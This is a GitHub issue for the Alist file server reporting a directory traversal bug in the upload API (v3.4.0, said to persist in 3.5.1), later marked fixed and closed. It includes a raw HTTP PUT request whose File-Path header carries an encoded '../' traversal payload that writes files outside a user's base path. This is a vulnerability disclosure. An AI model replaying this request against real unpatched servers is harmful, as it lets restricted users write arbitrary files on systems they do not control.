Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Directory traversal file upload vulnerability #2449

Closed
4 tasks done
Shydlock opened this issue Nov 22, 2022 · 4 comments
Closed
4 tasks done

Directory traversal file upload vulnerability #2449

Shydlock opened this issue Nov 22, 2022 · 4 comments
Labels
bug Something isn't working

Comments

@Shydlock
Copy link

Shydlock commented Nov 22, 2022
edited
Loading

Please make sure of the following things

  • I have read the documentation.
  • I'm sure there are no duplicate issues or discussions.
  • I'm sure it's due to alist and not something else(such as Dependencies or Operational).
  • I'm sure I'm using the latest version

Alist Version / Alist 版本

v3.4.0(It seems like this problem still exists in version 3.5.1)

Driver used / 使用的存储驱动

Local

Describe the bug / 问题描述

  • A user with only file upload permission can bypass the base path restriction by using '... /' to bypass the base path restriction and upload files to an arbitrary path

  • I created a user 'test' with file upload permission only and set its base path to '/test'

image

  • My file directory structure is as follows

image

image

image

  • Login as 'test', found out that I am already in '/test'

image

  • And try to upload a file, catch the package and modified the 'File-path' parameter with '../'

image

image

  • Send the package, and login as 'admin' to check out the '/testPasswd'. Will find out that the file has been uploaded successfully.

image

Reproduction / 复现链接

Package:
PUT /api/fs/put HTTP/1.1
Host: 192.168.31.148:52000
Content-Length: 30530
Accept: application/json, text/plain, /
As-Task: false
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJleHAiOjE2NjkyOTQ4NTMsIm5iZiI6MTY2OTEyMjA1MywiaWF0IjoxNjY5MTIyMDUzfQ.DwnVRyCGUZ0Cx2B7s6kCqvrg_-rzQ7hf5tbbsy4RSVc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
File-Path: ..%2ftestPasswd%2ftestDirectoryTraversal
Content-Type: application/octet-stream
Origin: http://192.168.31.148:52000
Referer: http://192.168.31.148:52000/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

�PNG

Logs / 日志

None
@Shydlock Shydlock added the bug Something isn't working label Nov 22, 2022
@github-actions
Copy link

See

  1. 73% Upload files to the directory with password Vulnerability(bypass) #2444

@Shydlock
Copy link
Author

It seems like this problem still exists in version 3.5.1

@BoYanZh
Copy link
Member

BoYanZh commented Nov 30, 2022

It should have been fixed in b5bf5f4.

@xhofe xhofe closed this as completed Dec 9, 2022
@Chestnuts4
Copy link

it just can only upload PNG file?

@github-actions github-actions bot mentioned this issue Jan 17, 2023
Closed
4 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@BoYanZh @xhofe @Shydlock @Chestnuts4